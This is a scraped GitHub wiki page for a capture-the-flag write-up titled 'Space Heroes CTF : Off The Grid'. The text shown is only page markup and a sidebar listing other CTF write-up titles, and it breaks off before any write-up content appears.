f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">Space Heroes CTF : Off The Grid</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-15T18:05:06Z" class="no-wrap">Apr 15, 2022</relative-time> · 1 revision </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path 